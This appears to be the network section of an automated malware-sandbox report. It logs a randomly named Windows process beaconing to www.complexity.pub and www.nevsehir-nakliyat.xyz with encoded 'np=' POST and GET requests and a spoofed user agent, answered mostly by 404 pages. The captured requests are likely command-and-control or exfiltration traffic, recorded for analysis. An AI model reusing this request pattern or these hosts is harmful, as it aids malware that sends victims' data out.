               Sep 18, 2024 09:02:38.895962954 CEST | 672 | IN | Data Raw: 68 56 41 30 37 59 2b 47 57 4e 4d 4f 42 43 78 49 49 70 43 67 43 70 41 58 35 4b 67 48 42 36 49 51 49 4c 48 77 45 33 48 58 6b 32 58 51 56 73 7a 64 53 6b 47 45 43 6a 55 41 42 68 50 4c 4d 64 54 2f 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56
              Data Ascii: hVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIs
               Sep 18, 2024 09:02:38.895976067 CEST | 1236 | IN | Data Raw: 47 69 56 6e 39 59 4e 66 38 62 46 42 64 34 52 55 52 46 6c 57 7a 42 76 79 42 45 71 49 69 34 49 39 61 6b 79 2b 32 72 32 39 35 39 37 2f 5a 44 36 32 2b 78 4b 56 66 42 74 4e 4d 36 71 61 48 52 47 36 31 65 72 58 50 42 4f 66 4f 36 48 4e 37 55 59 6c 4a 6d
              Data Ascii: GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6h
               Sep 18, 2024 09:02:38.895987034 CEST | 224 | IN | Data Raw: 39 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 35 30 25 3b 0a
              Data Ascii: 900%; } .status-reason { font-size: 450%; } } </style> </head> <body> <div class="container"> <secion class="response-info">
               Sep 18, 2024 09:02:38.895998955 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 63 6f 64 65 22 3e 0d 0a 33 37 0d 0a 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73
              Data Ascii: <span class="status-code">37404</span> <span class="status-reason">88Not Found</span> </section> <section class="contact-info"> Please forward this error screen to 1f
               Sep 18, 2024 09:02:38.896019936 CEST | 783 | IN | Data Raw: 37 7a 41 52 62 6f 4c 6b 39 34 74 48 39 4d 64 56 70 63 43 2f 64 34 68 68 6a 38 6c 33 46 32 2f 63 52 30 43 51 48 42 7a 4c 74 34 5a 57 6f 4a 36 32 6b 4d 75 2b 76 35 53 61 38 4d 3d 20 28 70 6f 72 74 20 0d 0a 32 0d 0a 38 30 0d 0a 37 33 0d 0a 29 0a 20
              Data Ascii: 7zARboLk94tH9MdVpcC/d4hhj8l3F2/cR0CQHBzLt4ZWoJ62kMu+v5Sa8M= (port 28073) </div> </li> <li class="info-server">107</li> </ul>


               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
               1 | 192.168.2.6 | 57951 | 217.160.0.127 | 80 | 3196 | C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
               Timestamp | Bytes transferred | Direction | Data
               Sep 18, 2024 09:03:02.057301044 CEST | 776 | OUT | POST /4c7j/ HTTP/1.1
              Host: www.complexity.pub
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 207
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.complexity.pub
              Referer: http://www.complexity.pub/4c7j/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6e 77 30 41 31 53 68 69 73 6e 76 6f 56 6e 56 67 38 32 55 30 36 34 55 31 46 35 65 5a 46 41 47 75 44 78 78 53 6c 43 6c 54 48 5a 61 6f 35 6c 63 69 48 39 4a 54 49 69 6f 76 64 72 6d 64 77 55 79 31 6c 47 6c 6c 38 30 71 37 32 30 5a 68 70 4d 61 6f 69 50 6b 50 31 4e 48 73 41 39 58 42 4b 62 43 76 71 59 2f 78 78 46 33 49 51 68 4e 37 2b 5a 45 64 73 42 51 2b 38 2b 6c 79 41 7a 35 71 45 44 4a 4f 73 48 72 38 4a 52 66 63 52 70 50 4f 33 33 68 6e 4e 52 49 35 44 59 34 38 51 76 31 5a 34 66 37 74 65 36 41 64 6c 39 71 4f 73 6c 6c 31 4a 64 6a 52 6e 32 50 31 55 38 5a 75 79 69 64 30 56 55 2b 34
              Data Ascii: np=spsn588TGAkFnw0A1ShisnvoVnVg82U064U1F5eZFAGuDxxSlClTHZao5lciH9JTIiovdrmdwUy1lGll80q720ZhpMaoiPkP1NHsA9XBKbCvqY/xxF3IQhN7+ZEdsBQ+8+lyAz5qEDJOsHr8JRfcRpPO33hnNRI5DY48Qv1Z4f7te6Adl9qOsll1JdjRn2P1U8Zuyid0VU+4
               Sep 18, 2024 09:03:02.686312914 CEST | 558 | IN | HTTP/1.1 404 Not Found
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Date: Wed, 18 Sep 2024 07:03:02 GMT
              Server: Apache
              Content-Encoding: gzip
              Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
              Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
               2 | 192.168.2.6 | 57952 | 217.160.0.127 | 80 | 3196 | C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
               Timestamp | Bytes transferred | Direction | Data
               Sep 18, 2024 09:03:04.721792936 CEST | 800 | OUT | POST /4c7j/ HTTP/1.1
              Host: www.complexity.pub
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 231
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.complexity.pub
              Referer: http://www.complexity.pub/4c7j/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6d 51 6b 41 33 31 39 69 6b 6e 76 72 51 6e 56 67 6c 6d 55 77 36 34 49 31 46 34 71 4a 45 30 71 75 44 51 42 53 6b 47 4a 54 47 5a 61 6f 7a 46 63 6a 4a 64 49 64 49 69 6b 52 64 75 4f 64 77 55 32 31 6c 47 31 6c 38 48 53 36 33 6b 5a 6a 68 73 61 6d 74 76 6b 50 31 4e 48 73 41 39 72 72 4b 62 71 76 71 73 44 78 79 6b 33 50 5a 42 4e 36 32 35 45 64 6d 68 51 79 38 2b 6c 41 41 33 35 51 45 41 39 4f 73 46 7a 38 48 6b 2f 66 49 5a 50 55 6f 6e 67 73 4b 42 4a 71 45 71 77 34 52 74 70 70 68 74 57 50 66 4d 42 48 35 4f 71 74 2b 31 46 33 4a 66 37 6a 6e 57 50 66 57 38 68 75 67 31 52 54 61 67 62 62 74 71 56 49 46 5a 63 56 55 70 44 74 65 51 75 68 76 59 76 50 6f 51 3d 3d
              Data Ascii: np=spsn588TGAkFmQkA319iknvrQnVglmUw64I1F4qJE0quDQBSkGJTGZaozFcjJdIdIikRduOdwU21lG1l8HS63kZjhsamtvkP1NHsA9rrKbqvqsDxyk3PZBN625EdmhQy8+lAA35QEA9OsFz8Hk/fIZPUongsKBJqEqw4RtpphtWPfMBH5Oqt+1F3Jf7jnWPfW8hug1RTagbbtqVIFZcVUpDteQuhvYvPoQ==
               Sep 18, 2024 09:03:05.348718882 CEST | 558 | IN | HTTP/1.1 404 Not Found
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Date: Wed, 18 Sep 2024 07:03:05 GMT
              Server: Apache
              Content-Encoding: gzip
              Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
              Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
               3 | 192.168.2.6 | 57953 | 217.160.0.127 | 80 | 3196 | C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
               Timestamp | Bytes transferred | Direction | Data
               Sep 18, 2024 09:03:07.261435986 CEST | 1813 | OUT | POST /4c7j/ HTTP/1.1
              Host: www.complexity.pub
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 1243
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.complexity.pub
              Referer: http://www.complexity.pub/4c7j/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6d 51 6b 41 33 31 39 69 6b 6e 76 72 51 6e 56 67 6c 6d 55 77 36 34 49 31 46 34 71 4a 45 30 69 75 43 6d 39 53 6c 6e 4a 54 55 4a 61 6f 77 46 63 6d 4a 64 49 51 49 69 38 4e 64 75 4b 6e 77 52 71 31 6b 67 35 6c 2b 32 53 36 35 6b 5a 6a 74 4d 61 6e 69 50 6b 67 31 4d 33 6f 41 39 62 72 4b 62 71 76 71 71 6e 78 6d 6c 33 50 56 68 4e 37 2b 5a 45 42 73 42 51 57 38 2b 63 33 41 33 39 36 45 54 6c 4f 73 6c 6a 38 4b 77 66 66 58 70 50 53 70 6e 67 2f 4b 42 45 79 45 75 70 44 52 73 63 68 68 75 4b 50 66 36 74 66 2b 74 47 43 76 6c 4a 6d 59 39 48 32 6e 32 62 72 59 63 39 5a 67 56 56 52 62 44 2f 45 75 2f 46 44 47 36 63 52 44 35 76 77 59 58 50 52 71 34 32 36 32 79 63 6c 38 66 70 63 54 36 38 39 6b 5a 75 6e 45 32 74 53 53 32 41 73 36 36 68 6a 33 50 31 6c 65 71 4a 61 30 63 72 64 46 49 6e 4d 61 32 78 4f 52 4e 46 6c 54 38 49 61 69 32 59 72 70 2b 68 45 50 62 58 6b 62 30 64 31 45 32 68 41 54 31 6d 36 56 6d 78 49 45 70 42 41 4e 37 48 6b 6c 72 75 2b 6b 76 54 31 6f 42 2b 44 38 57 43 45 67 57 37 [TRUNCATED]
               Data Ascii: np=spsn588TGAkFmQkA319iknvrQnVglmUw64I1F4qJE0iuCm9SlnJTUJaowFcmJdIQIi8NduKnwRq1kg5l+2S65kZjtManiPkg1M3oA9brKbqvqqnxml3PVhN7+ZEBsBQW8+c3A396ETlOslj8KwffXpPSpng/KBEyEupDRschhuKPf6tf+tGCvlJmY9H2n2brYc9ZgVVRbD/Eu/FDG6cRD5vwYXPRq4262ycl8fpcT689kZunE2tSS2As66hj3P1leqJa0crdFInMa2xORNFlT8Iai2Yrp+hEPbXkb0d1E2hAT1m6VmxIEpBAN7Hklru+kvT1oB+D8WCEgW7 [TRUNCATED]
               Sep 18, 2024 09:03:07.910938978 CEST | 558 | IN | HTTP/1.1 404 Not Found
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Date: Wed, 18 Sep 2024 07:03:07 GMT
              Server: Apache
              Content-Encoding: gzip
              Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
              Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
               4 | 192.168.2.6 | 57954 | 217.160.0.127 | 80 | 3196 | C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
               Timestamp | Bytes transferred | Direction | Data
               Sep 18, 2024 09:03:09.808584929 CEST | 511 | OUT | GET /4c7j/?O4s0=7rrhM&np=hrEH6McWLCF5pgA68gNL2x/WHVd3zz4Lu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW74id0uvrTjdsIz/rLBcjWUYSu3cGevEH/eSJ/+YdconAbopgpETc= HTTP/1.1
              Host: www.complexity.pub
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US,en;q=0.5
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
               Sep 18, 2024 09:03:10.462944031 CEST | 745 | IN | HTTP/1.1 404 Not Found
              Content-Type: text/html
              Content-Length: 601
              Connection: close
              Date: Wed, 18 Sep 2024 07:03:10 GMT
              Server: Apache
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


              Session ID: 5 | Source IP: 192.168.2.6 | Source Port: 57957 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 3196 | Process: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Timestamp: Sep 18, 2024 09:03:15.667309999 CEST | Bytes transferred: 797 | Direction: OUT | Data: POST /csz1/ HTTP/1.1
              Host: www.nevsehir-nakliyat.xyz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 207
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.nevsehir-nakliyat.xyz
              Referer: http://www.nevsehir-nakliyat.xyz/csz1/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Ascii: np=M3XIOEl8pWS+OGNU/snwK3MHHtxDnd7Jvzir5VT3W2I1OCYxZeB0gqSHAQff0ofgykuUCwzgB1fkCweELC+ZBPVO+UEWouy+05NHTufDD7Wk+73Pnxs9JE1uMPO0y8E30dTuafnzfJ5sDRZs0IbjOVISoj/sfnSBkAhhuP0Amc6wJsLzp+I/rznn9bSb8zWMW2vIWAkrMLKb


              Session ID: 6 | Source IP: 192.168.2.6 | Source Port: 57958 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 3196 | Process: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Timestamp: Sep 18, 2024 09:03:18.214801073 CEST | Bytes transferred: 821 | Direction: OUT | Data: POST /csz1/ HTTP/1.1
              Host: www.nevsehir-nakliyat.xyz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 231
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.nevsehir-nakliyat.xyz
              Referer: http://www.nevsehir-nakliyat.xyz/csz1/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Ascii: np=M3XIOEl8pWS+OmdU5PPwMXMELNxDyt7Fvzer5UXnWl81JiIxafB0tKSHLwfa6IesykThCy3gB17kCxOELxGYAfVMx0EUmOy+05NHTubpD9+k+KHPmQs+Dk1vNPO028Ez0dTYaa/VfLRsDTBs0ZbkFVIQmD+5XVfXphUwp/0l1diLIaKp1NIc5jHl9ZKp8TWmU2XIEXoMD/v4kxxILkQZYhBKrc1URzNkSg==


              Session ID: 7 | Source IP: 192.168.2.6 | Source Port: 57959 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 3196 | Process: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Timestamp: Sep 18, 2024 09:03:20.761667013 CEST | Bytes transferred: 1834 | Direction: OUT | Data: POST /csz1/ HTTP/1.1
              Host: www.nevsehir-nakliyat.xyz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 1243
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.nevsehir-nakliyat.xyz
              Referer: http://www.nevsehir-nakliyat.xyz/csz1/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Ascii: np=M3XIOEl8pWS+OmdU5PPwMXMELNxDyt7Fvzer5UXnWkE1ORwxa8Z0sKSHEgfb6IehykLtCyqdB3TkBTWENAGYZPVM6UEZouyn059DTuLpD9+k+IPPvhs+Q01uMPOwy8EL0b7mabLFf6xsDzRs2vvkalIOhD/6XVSJph48p8of1f+LEdGynJMHqSzgh7C96jiCYGTMSEAEPOr3o01OOCJgIwlrr8gLFHE4S5DoAFEc64W0lLYe/i/P7rv8E6OVLIbtYcZOwax2uEzRdRr1imr1OfV3hzq3MF985ysnFaG+12A+XVIWu7+ZVD37wkxLc65K9Y0kxogGJpeMnUV8TsBOFNcHgAdJh+nZ/ESgM+6T3UWvemIJL2dBzdJt94eng7zX569gVE8jE/KFvx99XFcz96aqPzquwyQ2zuI+2tB95TbsDlIrWEauqGiYTNuN4y+aF0g+BM3d+D8Kkx6sAP7bmc8KQjeSozYhPwFDGXi2L65DYfTyDk66JfTbTrqfwe76xL6dD1khsZjfsnc5Fk6HhnytHITsVsFNZJlPEABISR9/w8K7SVOZVd32ADgFRNW1YBnUz4pQCaQHH3X8b9FI9il784kvXzIrdaSzVeCQHeeuO7UI5Jt6gnNlJjO2XiMnjWGoqftuIiaiid/nWzuEwcP3WG0fbz49zCw4/UwWa5DVC0mf1d7Qho1To+jEzHp7X2fB0rbEJbiZz7MvZIsSKcfSpdVgN6lAN3i5qtjknbgKHRi7vBU4tsgJaET6PJcIwqF8drarWrjMr6KmaAB49Jy62PVMJpIuBJASYvh4qAneWcbzEUr0Unf1a2Lg2+915Sphyc+EbbQkSfWcYHABvu4iMN00EI5a+M8YxGE5zSo+6XUaGOwmJJBLAGE5qUEODsF2EVx/luzpCM/WUIOSrs8iwZnxa3wVwWa4aC40+vC2TWXvB4mHXtYla+aB5L85epYQEqqkNWZ6niauZAf7gQu3mr9myfZQlgm6i4HOw7vy6lYni [TRUNCATED]


              Session ID: 8 | Source IP: 192.168.2.6 | Source Port: 57960 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 3196 | Process: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Timestamp: Sep 18, 2024 09:03:23.305459023 CEST | Bytes transferred: 518 | Direction: OUT | Data: GET /csz1/?np=B1/oNyROsiSyJWt29sj2S0IFRvICl+iEjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eGqtyx0Ndpfqa25N0T4jVP+zcs/aWlws8PlhiBv+1+sYYzcOzaf0=&O4s0=7rrhM HTTP/1.1
              Host: www.nevsehir-nakliyat.xyz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US,en;q=0.5
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Timestamp: Sep 18, 2024 09:03:24.018718004 CEST | Bytes transferred: 225 | Direction: IN | Data: HTTP/1.1 404 Not Found
              Server: nginx/1.14.1
              Date: Wed, 18 Sep 2024 07:03:23 GMT
              Content-Length: 0
              Connection: close
              X-Rate-Limit-Limit: 5s
              X-Rate-Limit-Remaining: 19
              X-Rate-Limit-Reset: 2024-09-18T07:03:28.9027992Z


